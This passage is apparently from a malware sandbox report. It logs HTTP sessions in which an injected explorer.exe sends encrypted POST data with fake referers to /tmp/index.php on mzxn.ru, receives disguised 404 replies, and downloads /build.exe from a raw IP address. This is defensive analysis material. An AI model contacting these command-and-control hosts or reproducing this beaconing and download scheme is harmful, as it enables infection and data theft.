Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	62250	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:58.896781921 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://soaxpgcflilwcjk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: mzxn.ru
Jul 27, 2024 07:43:58.896815062 CEST	328	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 33 19 d0 ed Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vu3mg[HN@qzavlSK0_:+OMz^Gh<z2-&TeO\|&ZCL-R_W\cr_@b
Jul 27, 2024 07:43:59.939809084 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	62251	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:59.951180935 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jtecgpbonqhjbs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: mzxn.ru
Jul 27, 2024 07:43:59.951180935 CEST	181	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 63 54 ac f5 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vucTumNgvb`6 O[dlJT?4"}qC}J7-
Jul 27, 2024 07:44:01.039027929 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	62256	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:11.538995028 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kriqrmlnqypou.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 357 Host: mzxn.ru
Jul 27, 2024 07:44:11.538995028 CEST	357	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 2d 19 c5 88 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA ,[k,vu-zB\\_}1oW?/e#uzB`B4xa5zaQA;(Ng<vF/YzWs]U=V@4H&]
Jul 27, 2024 07:44:12.576324940 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	62257	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:12.621900082 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wrfvitgbvcw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: mzxn.ru
Jul 27, 2024 07:44:12.621900082 CEST	166	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3c 57 de 8d Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu<WeXkI_59_?Hm,O[_6}^WSY3)MrB"NlzO
Jul 27, 2024 07:44:13.663949013 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:13 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	62259	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:13.671597004 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bnvcslusckae.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: mzxn.ru
Jul 27, 2024 07:44:13.671638012 CEST	189	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5f 00 d3 f2 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu_Dt{"r5{cWNDRUU(5D`cy\|222s.HnOWe
Jul 27, 2024 07:44:14.727499008 CEST	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	62262	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:16.069024086 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qinwutyayfcko.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 360 Host: mzxn.ru
Jul 27, 2024 07:44:16.069046974 CEST	360	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 05 6b 2c 90 f4 76 0b 75 5c 58 b7 a3 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA ,[k,vu\XiF@\|t39ii4PW[r"T01L)I,517Iz]qp[/DdIi~^i8
Jul 27, 2024 07:44:17.139601946 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	62265	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:17.153639078 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fpsqjgbmrba.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: mzxn.ru
Jul 27, 2024 07:44:17.153639078 CEST	280	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5a 06 a4 fb Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vuZJm\|O"%d6p8jnU~RCS37YO1kS'B22?I&"e"J~r^66"IEk=yy4W?+m
Jul 27, 2024 07:44:18.214370966 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	62267	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:18.222484112 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fnhraoopptocahym.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 176 Host: mzxn.ru
Jul 27, 2024 07:44:18.222517967 CEST	176	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 38 07 bb e5 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu8SSgCZ_v\x zIW]Mk2TuY2I9L
Jul 27, 2024 07:44:19.266546965 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	62269	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:19.275391102 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uffvfrhcnqd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: mzxn.ru
Jul 27, 2024 07:44:19.275424957 CEST	198	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 21 40 ad a1 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu!@v[S%cc\=h=K[hPI\3,3{MVky7"d6)JOjHl1Sz
Jul 27, 2024 07:44:20.305691004 CEST	188	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	62271	109.172.114.212	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:20.324352026 CEST	162	OUT	GET /build.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 109.172.114.212

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	62273	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:44:22.575361013 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mbsrmkgaclwdahn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: mzxn.ru
Jul 27, 2024 07:44:22.575361013 CEST	121	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 30 1f b9 b7 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu0g7OxX5"^R<2 Pov
Jul 27, 2024 07:44:23.587059021 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:44:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	62347	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:45:33.488702059 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hkiilqyskldjgofe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: mzxn.ru
Jul 27, 2024 07:45:33.488702059 CEST	187	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 4e e7 94 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA .[k,vu$N^fue4O[T(,mG~9iK)6Na=J=.~fI1_e3
Jul 27, 2024 07:45:34.541039944 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:45:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	62353	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:45:42.906269073 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://brdcuglswdjuibu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: mzxn.ru
Jul 27, 2024 07:45:42.906302929 CEST	129	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 3b d0 bb Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA .[k,vu);Gy\a-$7!F\|;r_7
Jul 27, 2024 07:45:43.962272882 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:45:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

